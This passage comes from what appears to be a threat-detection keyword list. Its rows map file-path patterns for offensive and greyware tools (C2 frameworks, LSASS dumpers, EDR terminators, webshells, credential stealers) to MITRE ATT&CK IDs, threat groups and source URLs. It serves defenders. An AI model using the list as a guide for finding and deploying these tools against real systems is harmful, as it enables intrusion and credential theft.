Movement,T1021.002 - T1021.006 - T1021.004,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/MoveKit,1,1,N/A,10,7,615,114,2020-02-21T20:23:45Z,2020-01-24T22:19:16Z -*\SharpNoPSExec*,offensive_tool_keyword,SharpNoPSExec,Get file less command execution for lateral movement.,T1021.006 - T1059.003 - T1105,TA0008 - TA0002 - TA0011,N/A,N/A,Lateral Movement,https://github.com/juliourena/SharpNoPSExec,1,0,N/A,10,6,567,85,2022-06-03T10:32:55Z,2021-04-24T22:02:38Z -*\SharpRDPHijack*,offensive_tool_keyword,SharpRDPHijack,SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions,T1021.001 - T1078.003 - T1059.001,TA0002 - TA0008 - TA0006,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/bohops/SharpRDPHijack,1,0,N/A,10,4,382,84,2021-07-25T17:36:01Z,2020-07-06T02:59:46Z -*\SharpSpray.exe*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,0,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z -*\SharpTerminator.csproj*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,0,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*\SharPyShell*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*\shellcode_loader.dll*,offensive_tool_keyword,GadgetToJScript,A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.,T1059.001 - T1078 - T1059.005,TA0002 - TA0004 - TA0001,N/A,N/A,Exploitation tools,https://github.com/med0x2e/GadgetToJScript,1,0,N/A,10,8,777,157,2021-07-26T17:35:40Z,2019-10-05T12:27:19Z -*\shellcode_samples\*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\sherlock.exe*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*\Shhmon.*,offensive_tool_keyword,shhmon,Neutering Sysmon via driver unload,T1518.001 ,TA0007,N/A,N/A,Defense Evasion,https://github.com/matterpreter/Shhmon,1,1,N/A,N/A,3,210,35,2022-10-13T16:56:41Z,2019-09-12T14:13:19Z -*\Siber Systems\GoodSync\*,greyware_tool_keyword,Goodsync,GoodSync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://www.goodsync.com/,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\SigFlip.exe*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*\sigthief.exe*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,0,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z -*\SilentClean.exe*,offensive_tool_keyword,cobaltstrike,New UAC bypass for Silent Cleanup for CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/UAC-SilentClean,1,0,N/A,10,10,173,32,2021-07-14T13:51:02Z,2020-10-07T13:25:21Z -*\SilentProcessExit.sln*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,0,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*\SillyRAT\*.py,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\SimpleLoader.cpp*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*\SimpleLoader.exe*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*\sitadel.log*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -*\SMB_RPC\*.py,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*\smuggler.py*,offensive_tool_keyword,smuggler.py,HTML Smuggling Generator,T1564.001 - T1027 - T1566,TA0005,N/A,N/A,Phishing - Defense Evasion,https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py,1,0,N/A,9,3,228,42,2023-06-14T02:13:19Z,2023-01-15T22:37:34Z -*\sniff.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*\SoftPerfect Network Scanner*,greyware_tool_keyword,netscan,SoftPerfect Network Scanner abused by threat actor,T1040 - T1046 - T1018,TA0007 - TA0010 - TA0001,N/A,N/A,Network Exploitation tools,https://www.softperfect.com/products/networkscanner/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*\spacerunner.exe*,greyware_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*\spellbound-main*,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*\spellgen.py *,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*\spellstager.py *,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*\SpoofCmdLine\TheThing*,offensive_tool_keyword,SwampThing,SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones,T1036.005 - T1564.002,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing,1,0,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*\SprayAD.cna*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*\SprayAD.exe*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*\SQLInfoDumps*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*\SQLRecon*,offensive_tool_keyword,SQLRecon,A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation,T1003.003 - T1049 - T1059.005 - T1078.003,TA0005 - TA0006 - TA0002 - TA0004,N/A,N/A,Network Exploitation Tools,https://github.com/skahwah/SQLRecon,1,0,N/A,N/A,6,502,97,2023-08-10T00:42:31Z,2021-11-19T15:58:49Z -*\stager.ps1*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*\start_campaign.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*\StayKit.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,0,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*\StolenPasswords.txt*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,0,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\Suborner.sln*,offensive_tool_keyword,Suborner,The Invisible Account Forger - A simple program to create a Windows account you will only know about ,T1098 - T1175 - T1033,TA0007 - TA0008 - TA0003,N/A,N/A,Persistence,https://github.com/r4wd3r/Suborner,1,0,N/A,N/A,5,452,58,2022-09-02T09:04:46Z,2022-04-26T00:12:58Z -*\Supernova.exe*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*\Supershell.tar.gz*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*\Supershell\rssh\pkg\*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*\Supershell\rssh\pkg\*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*\system32.zip*,greyware_tool_keyword,ntdsutil,creating a full backup of the Active Directory database and saving it to the \temp directory,T1003.001 - T1070.004 - T1059,TA0005 - TA0003 - TA0002,N/A,N/A,Credential Access,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\systemic.txt,offensive_tool_keyword,cobaltstrike,Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/BOF-RegSave,1,1,N/A,10,10,171,29,2020-10-08T17:29:02Z,2020-10-07T13:46:03Z -*\TakeMyRDP*,offensive_tool_keyword,TakeMyRDP,A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/TheD1rkMtr/TakeMyRDP,1,1,N/A,N/A,3,278,56,2023-08-02T02:23:28Z,2023-07-02T17:25:33Z -*\TASKSHELL.EXE*,offensive_tool_keyword,cobaltstrike,tamper scheduled task with a binary,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/TaskShell,1,0,N/A,10,10,54,8,2021-02-15T19:23:13Z,2021-02-15T19:22:26Z -*\teamserver-win.zip*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,0,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*\teamstracker.py*,offensive_tool_keyword,teamstracker,using graph proxy to monitor teams user presence,T1552.007 - T1052.001 - T1602,TA0003 - TA0005 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/teamstracker,1,0,N/A,3,1,46,3,2023-08-25T15:07:14Z,2023-08-15T03:41:46Z -*\Temp\*\ntds.dit*,greyware_tool_keyword,wmic,The NTDS.dit file is the heart of Active Directory including user accounts If it's found in the Temp directory it could indicate that an attacker has copied the file here in an attempt to extract sensitive information.,T1047 - T1005 - T1567.001,TA0002 - TA0003 - TA0007,N/A,Volt Typhoon,Credential Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\Temp\*\ntds.jfm*,greyware_tool_keyword,wmic,Like the ntds.dit file it should not normally be found in the Temp directory.,T1047 - T1005 - T1567.001,TA0002 - TA0003 - TA0007,N/A,Volt Typhoon,Credential Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\TEMP\AteraUpgradeAgentPackage\*,greyware_tool_keyword,Atera,control remote machines- abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\temp\dump.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*\Temp\dumpert*,offensive_tool_keyword,Dumpert,Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.,T1003 - T1055 - T1083 - T1059 - T1204,TA0003 - TA0005 - TA0002,N/A,N/A,Credential Access,https://github.com/outflanknl/Dumpert,1,0,N/A,N/A,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*\temp\hollow.dll*,offensive_tool_keyword,SQLRecon,A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation,T1003.003 - T1049 - T1059.005 - T1078.003,TA0005 - TA0006 - TA0002 - TA0004,N/A,N/A,Network Exploitation Tools,https://github.com/skahwah/SQLRecon,1,0,N/A,N/A,6,502,97,2023-08-10T00:42:31Z,2021-11-19T15:58:49Z -*\temp\pwned.trx*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*\Temp\Reaper.exe*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*\Temp\RTCore64.sys*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,0,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*\TEMP\ScreenConnect\*.ps1*,greyware_tool_keyword,ScreenConnect,control remote servers - abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,screenconnect.com,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\Temp\whoami.txt*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*\tests\beacon64.bin*,offensive_tool_keyword,C2 related tools,Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ThreadStackSpoofer,1,0,N/A,10,10,875,158,2022-06-17T18:06:35Z,2021-09-26T22:48:17Z -*\TGSThief\*,offensive_tool_keyword,TGSThief,get the TGS of a user whose logon session is just present on the computer,T1558 - T1558.003 - T1078 - T1078.005,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/MzHmO/TGSThief,1,0,N/A,9,2,129,18,2023-07-25T05:30:39Z,2023-07-23T07:47:05Z -*\the-backdoor-factory\*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*\ThemeBleed.exe *,offensive_tool_keyword,themebleed,Proof-of-Concept for CVE-2023-38146,T1566.001 - T1077 - T1213.002,TA0007 - TA0011 - TA0010,N/A,N/A,Exploitation tools,https://github.com/gabe-k/themebleed,1,0,N/A,10,2,143,27,2023-09-13T04:50:29Z,2023-09-13T04:00:14Z 